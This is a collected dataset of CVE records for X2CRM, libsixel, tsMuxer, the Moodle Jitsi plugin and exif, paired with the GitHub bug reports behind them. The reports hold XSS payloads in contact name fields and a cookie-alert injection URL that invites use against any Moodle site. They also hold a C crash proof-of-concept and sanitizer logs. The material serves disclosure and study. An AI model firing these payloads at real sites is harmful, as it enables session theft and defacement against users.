{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/161" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/161" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:x2engine:x2crm:*:*:*:*:*:*:*:*", "matchCriteriaId": "E857D0EB-324B-4501-9AA1-966454FEFF3A", "versionEndExcluding": null, "versionEndIncluding": "7.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/X2Engine/X2CRM/issues/161
[ "Exploit", "Third Party Advisory" ]
github.com
[ "X2Engine", "X2CRM" ]
Hi, Description : Create a contact with first name: test"><img src=x onerror=prompt('@darknetguy');> and last name : test2"><img src=x onerror=prompt('@darknetguy');> ( you can even delete the contact its worst!) XSS will run in to all pages than activity feed is present. ( in X2CRM CE V6.9) Sample Pic: ![2018-11-06_14-33-13](https://user-images.githubusercontent.com/21213484/48060574-a22be400-e1d1-11e8-97d4-1a076a0a1b78.png) Payload to use : "><img src=x onerror=prompt('@darknetguy');> Tested on Windows 10 Firefox | Google Chrome // Cent-OS 7 Firefox | Chromium BR, Milad Fadavvi
Stored XSS in Contact firsname and last name
https://api.github.com/repos/X2Engine/X2CRM/issues/161/comments
1
2018-11-06T11:12:54Z
2023-03-28T17:17:01Z
https://github.com/X2Engine/X2CRM/issues/161
377,799,415
161
1,833
CVE-2020-21088
2021-04-14T14:15:13.210
Cross Site Scripting (XSS) in X2engine X2CRM v7.1 and older allows remote attackers to obtain sensitive information by injecting arbitrary web script or HTML via the "First Name" and "Last Name" fields in "/index.php/contacts/create page"
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/161" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/161" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:x2engine:x2crm:*:*:*:*:*:*:*:*", "matchCriteriaId": "E857D0EB-324B-4501-9AA1-966454FEFF3A", "versionEndExcluding": null, "versionEndIncluding": "7.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/X2Engine/X2CRM/issues/183
[ "Exploit", "Third Party Advisory" ]
github.com
[ "X2Engine", "X2CRM" ]
Hi, I have found the multiple stored XSS in the X2crm version 7.1. I like to report them and get the CVE. Location: http://localhost/x2crm/x2engine/index.php/contacts/create Parameter: Last Name Payload inserted ![1](https://user-images.githubusercontent.com/78723738/107608036-c6a08180-6c60-11eb-8cd0-98518fa1de8e.png) Execution of the payload ![2](https://user-images.githubusercontent.com/78723738/107608058-da4be800-6c60-11eb-8d40-cd80dd9d96fc.png) Location: http://localhost/x2crm/x2engine/index.php//profile/activity Parameter: comments payload inserted ![1](https://user-images.githubusercontent.com/78723738/107608122-0bc4b380-6c61-11eb-925a-f2b95c32531c.png) Execution of the payload ![2](https://user-images.githubusercontent.com/78723738/107608129-141cee80-6c61-11eb-9167-e8cebaa28d6a.png)
Multiple Cross Site Scripting in X2CRM 7.1
https://api.github.com/repos/X2Engine/X2CRM/issues/183/comments
0
2021-02-11T06:35:05Z
2021-02-11T06:35:05Z
https://github.com/X2Engine/X2CRM/issues/183
806,119,584
183
1,834
CVE-2020-36120
2021-04-14T14:15:13.287
Buffer Overflow in the "sixel_encoder_encode_bytes" function of Libsixel v1.8.6 allows attackers to cause a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/143" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/143" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.6:*:*:*:*:*:*:*", "matchCriteriaId": "D78CB59C-7966-46E3-A325-A7508F0ED51D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/saitoha/libsixel/issues/143
[ "Exploit", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
Version Libsixel :1.8.6 Ubuntu 20.04 LTS I fuzzed the sixelapi ``` #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include "sixel.h" int main(){ sixel_encoder_t *encoder=NULL; int ncolors=16; char opt[256]={0}; SIXELSTATUS status; unsigned char data[4096]={0xa,0xa,0xa,0xa,0xc7,0xc7,0xc7,0xc7,0xc7,0xc7,0xc7, 0xc7,0xc7,0xa,0xc7,0xc7,0xf2,0x60,0xa,0x60,0x60,0x60, 0x60,0xa,0x60,0x60,0x60,0x60,0x60,0x60,0x60,0x60,0x60, 0x60,0x60,0x60,0x60,0x60,0x60,0xa,0x60,0x60,0xa,0x60, 0x60,0x60,0x60,0x60,0x60,0x60,0x60,0xa,0x60,0x60,0x60, 0x60,0x60,0x60,0x60,0x60,0x60,0x60,0x60,0x60,0x60,0x60, 0x60,0x60,0x60,0x60,0x60,0xa,0x60,0x60,0x60,0x60,0x60, 0x60,0x60,0x60,0x0,0xa,0x0,0xa,0xa,0x0,0x0,0xa,0xa,0x0, 0x0,0xa,0xa,0x0,0xa,0xa,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0}; status = sixel_encoder_new(&encoder,NULL); if(SIXEL_FAILED(status)) return 0; sprintf(opt, "%d", ncolors); status = sixel_encoder_setopt(encoder,SIXEL_OPTFLAG_COLORS,opt); if(SIXEL_FAILED(status)) return 0; status = sixel_encoder_encode_bytes(encoder,(unsigned char*)data,400,300,SIXEL_PIXELFORMAT_RGBA8888,NULL,(-1)); if(SIXEL_FAILED(status)) return 0; printf("[+] end\n"); sixel_encoder_unref(encoder); return 0; } ``` Please use the following method to compile the attached cc file and run ``` clang++ -g -fsanitize=address -I/usr/local/include -L/usr/local/lib -lsixel poc.cc -o poc ``` [poc](https://github.com/saitoha/libsixel/files/5752939/demo2.txt) Because uploading the zip failed,I switched to a txt file,please download the attachment and modify the suffix to cc ``` ==344010==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff79a6ae60 at pc 0x7f2d3c751a0c bp 0x7fff79a68d00 sp 0x7fff79a68cf8 READ of size 1 at 0x7fff79a6ae60 thread T0 #0 0x7f2d3c751a0b in get_rgb /home/hx/userData/tools/libsixel/src/pixelformat.c:50:18 #1 0x7f2d3c750fe9 in expand_rgb /home/hx/userData/tools/libsixel/src/pixelformat.c:186:13 #2 0x7f2d3c750a8d in sixel_helper_normalize_pixelformat /home/hx/userData/tools/libsixel/src/pixelformat.c:294:9 #3 0x7f2d3c74712a in sixel_dither_initialize /home/hx/userData/tools/libsixel/src/dither.c:559:18 #4 0x7f2d3c7cf3c6 in sixel_encoder_prepare_palette /home/hx/userData/tools/libsixel/src/encoder.c:575:14 #5 0x7f2d3c7cc367 in sixel_encoder_encode_frame /home/hx/userData/tools/libsixel/src/encoder.c:981:14 #6 0x7f2d3c7cbea2 in sixel_encoder_encode_bytes /home/hx/userData/tools/libsixel/src/encoder.c:1816:14 #7 0x4c6dbb in main /home/hx/userData/tools/libsixel/demo2.cc:34:11 #8 0x7f2d3c1650b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16 #9 0x41c31d in _start (/home/hx/userData/tools/libsixel/demo2+0x41c31d) Address 0x7fff79a6ae60 is located in stack of thread T0 at offset 4480 in frame #0 0x4c6abf in main /home/hx/userData/tools/libsixel/demo2.cc:8 This frame has 3 object(s): [32, 40) 'encoder' (line 10) [64, 320) 'opt' (line 12) [384, 4480) 'data' (line 14) <== Memory access at offset 4480 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hx/userData/tools/libsixel/src/pixelformat.c:50:18 in get_rgb Shadow bytes around the buggy address: 0x10006f345570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f345580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f345590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f3455a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f3455b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10006f3455c0: 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3 0x10006f3455d0: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 0x10006f3455e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f3455f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f345600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f345610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==344010==ABORTING ```
stack-buffer-overflow in sixel_encoder_encode_bytes at encoder.c:1788
https://api.github.com/repos/saitoha/libsixel/issues/143/comments
3
2020-12-30T04:12:13Z
2025-02-18T21:05:16Z
https://github.com/saitoha/libsixel/issues/143
776,206,246
143
1,835
CVE-2021-26805
2021-04-14T14:15:13.350
Buffer Overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a malicious WAV file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/395" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/395" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*", "matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/justdan96/tsMuxer/issues/395
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
hello,guys.I use afl-fuzz to test tsMuxer.I found a crash. ``` ./tsmuxer poc.wav ``` tsMuxer: 2.6.16 OS:ubuntu 20.04 [poc.zip](https://github.com/justdan96/tsMuxer/files/5916863/poc.zip) Asan log ``` tsMuxeR version git-c515350. github.com/justdan96/tsMuxer ================================================================= ==1374967==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b951 at pc 0x55b50151fa0e bp 0x7ffc47bf1430 sp 0x7ffc47bf1420 READ of size 1 at 0x60200000b951 thread T0 #0 0x55b50151fa0d in BitStreamReader::getCurVal(unsigned int*) /home/hx_server/userData/target/tsMuxer/tsMuxer/bitStream.h:62 #1 0x55b50151fa0d in BitStreamReader::setBuffer(unsigned char*, unsigned char*) /home/hx_server/userData/target/tsMuxer/tsMuxer/bitStream.h:71 #2 0x55b50151fa0d in VC1SequenceHeader::decode_entry_point() /home/hx_server/userData/target/tsMuxer/tsMuxer/vc1Parser.cpp:314 #3 0x55b501531da4 in VC1StreamReader::checkStream(unsigned char*, int) /home/hx_server/userData/target/tsMuxer/tsMuxer/vc1StreamReader.cpp:139 #4 0x55b50116272b in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /home/hx_server/userData/target/tsMuxer/tsMuxer/metaDemuxer.cpp:765 #5 0x55b501170383 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /home/hx_server/userData/target/tsMuxer/tsMuxer/metaDemuxer.cpp:684 #6 0x55b50106f372 in detectStreamReader(char const*, MPLSParser*, bool) /home/hx_server/userData/target/tsMuxer/tsMuxer/main.cpp:120 #7 0x55b500e09a13 in main /home/hx_server/userData/target/tsMuxer/tsMuxer/main.cpp:698 #8 0x7f05816a20b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #9 0x55b500e533ed in _start (/home/hx_server/userData/target/tsMuxer/afl_build/tsMuxer/tsmuxer+0x1943ed) 0x60200000b951 is located 0 bytes to the right of 1-byte region [0x60200000b950,0x60200000b951) allocated by thread T0 here: #0 0x7f0581dc7b47 in operator new[](unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10fb47) #1 0x55b5015315f2 in VC1Unit::vc1_unescape_buffer(unsigned char*, int) /home/hx_server/userData/target/tsMuxer/tsMuxer/vc1Parser.h:94 #2 0x55b5015315f2 in VC1StreamReader::checkStream(unsigned char*, int) /home/hx_server/userData/target/tsMuxer/tsMuxer/vc1StreamReader.cpp:138 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hx_server/userData/target/tsMuxer/tsMuxer/bitStream.h:62 in BitStreamReader::getCurVal(unsigned int*) Shadow bytes around the buggy address: 0x0c047fff96d0: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fd 0x0c047fff96e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa 0x0c047fff96f0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd 0x0c047fff9700: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa 0x0c047fff9710: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fa =>0x0c047fff9720: fa fa fd fd fa fa 00 00 fa fa[01]fa fa fa fa fa 0x0c047fff9730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9740: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9750: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9760: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1374967==ABORTING ``` gdb ``` [ Legend: Modified register | Code | Heap | Stack | String ] ──── registers ──── $rax : 0x0 $rbx : 0x00007ffff793c080 → 0x00007ffff793c080 → [loop detected] $rcx : 0x00007ffff79bb18b → <raise+203> mov rax, QWORD PTR [rsp+0x108] $rdx : 0x0 $rsp : 0x00007fffffff7090 → 0x0000000000000000 $rbp : 0x00007fffffff73e0 → 0x00007fffffff7490 → 0x00007fffffff74b0 → 0x00007fffffff74d0 → 0x00007fffffffd470 → 0x00007fffffffd940 → 0x00007fffffffdb20 → 0x00007fffffffe310 $rsi : 0x00007fffffff7090 → 0x0000000000000000 $rdi : 0x2 $rip : 0x00007ffff79bb18b → <raise+203> mov rax, QWORD PTR [rsp+0x108] $r8 : 0x0 $r9 : 0x00007fffffff7090 → 0x0000000000000000 $r10 : 0x8 $r11 : 0x246 $r12 : 0x00007fffffff7300 → 0x00007ffff39382e1 → 0xac440000ac440001 $r13 : 0x10 $r14 : 0x00007ffff7ffb000 → 0x6565726600001000 $r15 : 0x1 $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 ──── stack ──── 0x00007fffffff7090│+0x0000: 0x0000000000000000 ← $rsp, $rsi, $r9 0x00007fffffff7098│+0x0008: 0x0000ffff00001f80 0x00007fffffff70a0│+0x0010: 0x0000000000000000 0x00007fffffff70a8│+0x0018: 0x00007ffff7b79f40 → <_Unwind_RaiseException+0> endbr64 0x00007fffffff70b0│+0x0020: 0x4000000000000000 0x00007fffffff70b8│+0x0028: 0x0000000000000000 0x00007fffffff70c0│+0x0030: 0x0000000000000000 0x00007fffffff70c8│+0x0038: 0x0000000000000000 ──── code:x86:64 ──── 0x7ffff79bb17f <raise+191> mov edi, 0x2 0x7ffff79bb184 <raise+196> mov eax, 0xe 0x7ffff79bb189 <raise+201> syscall → 0x7ffff79bb18b <raise+203> mov rax, QWORD PTR [rsp+0x108] 0x7ffff79bb193 <raise+211> xor rax, QWORD PTR fs:0x28 0x7ffff79bb19c <raise+220> jne 0x7ffff79bb1c4 <__GI_raise+260> 0x7ffff79bb19e <raise+222> mov eax, r8d 0x7ffff79bb1a1 <raise+225> add rsp, 0x118 0x7ffff79bb1a8 <raise+232> ret ──── threads ──── [#0] Id 1, Name: "tsmuxer", stopped 0x7ffff79bb18b in __GI_raise (), reason: SIGABRT ──── trace ──── [#0] 0x7ffff79bb18b → __GI_raise(sig=0x6) [#1] 0x7ffff799a859 → __GI_abort() [#2] 0x7ffff7a053ee → __libc_message(action=do_abort, fmt=0x7ffff7b2f285 "%s\n") [#3] 0x7ffff7a0d47c → malloc_printerr(str=0x7ffff7b2d4ae "free(): invalid pointer") [#4] 0x7ffff7a0ecac → _int_free(av=<optimized out>, p=<optimized out>, have_lock=0x0) [#5] 0x55555575961a → VC1Unit::~VC1Unit()() [#6] 0x5555557596f6 → VC1SequenceHeader::~VC1SequenceHeader()() [#7] 0x555555759842 → VC1StreamReader::~VC1StreamReader()() [#8] 0x55555574fc24 → METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int)() [#9] 0x55555574ee31 → METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool)() ───── ``` ------------------------------------------------- HX from **Topsec alpha Security Team**
heap-buffer-overflow tsmuxer
https://api.github.com/repos/justdan96/tsMuxer/issues/395/comments
3
2021-02-03T07:49:24Z
2022-06-23T07:24:44Z
https://github.com/justdan96/tsMuxer/issues/395
800,071,295
395
1,836
CVE-2021-26812
2021-04-14T14:15:13.413
Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/udima-university/moodle-mod_jitsi/issues/67" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/udima-university/moodle-mod_jitsi/issues/67" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:*", "matchCriteriaId": "D297DB3D-2A13-4189-8BFD-21118DD56229", "versionEndExcluding": null, "versionEndIncluding": "2.8.3", "versionStartExcluding": null, "versionStartIncluding": "2.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/udima-university/moodle-mod_jitsi/issues/67
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "udima-university", "moodle-mod_jitsi" ]
The parameter "nom" is not filtered properly causing javascript code to be injected. ![source1-jitsi](https://user-images.githubusercontent.com/19190279/106273585-59e2bb80-624c-11eb-808d-024213720bda.png) ![source2-jitsi](https://user-images.githubusercontent.com/19190279/106273602-6109c980-624c-11eb-9a60-5c9062b27f3c.png) [Moodle Jitsi Plugin XSS POC.pdf](https://github.com/udima-university/moodle-mod_jitsi/files/5893715/Moodle.Jitsi.Plugin.XSS.POC.pdf) It can be easily triggered by clicking this URL https://targetdomain.com/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.cookie)%3b//&ses=test_user&t=1 replace "targetdomain.com" with any moodle website you know that is using this plugin.
Cross-site scripting (XSS) in sessionpriv.php
https://api.github.com/repos/udima-university/moodle-mod_jitsi/issues/67/comments
6
2021-01-29T12:13:02Z
2021-04-15T06:37:38Z
https://github.com/udima-university/moodle-mod_jitsi/issues/67
796,833,200
67
1,837
CVE-2021-27815
2021-04-14T14:15:13.787
NULL Pointer Deference in the exif command line tool, when printing out XML formatted EXIF data, in exif v0.6.22 and earlier allows attackers to cause a Denial of Service (DoS) by uploading a malicious JPEG file, causing the application to crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
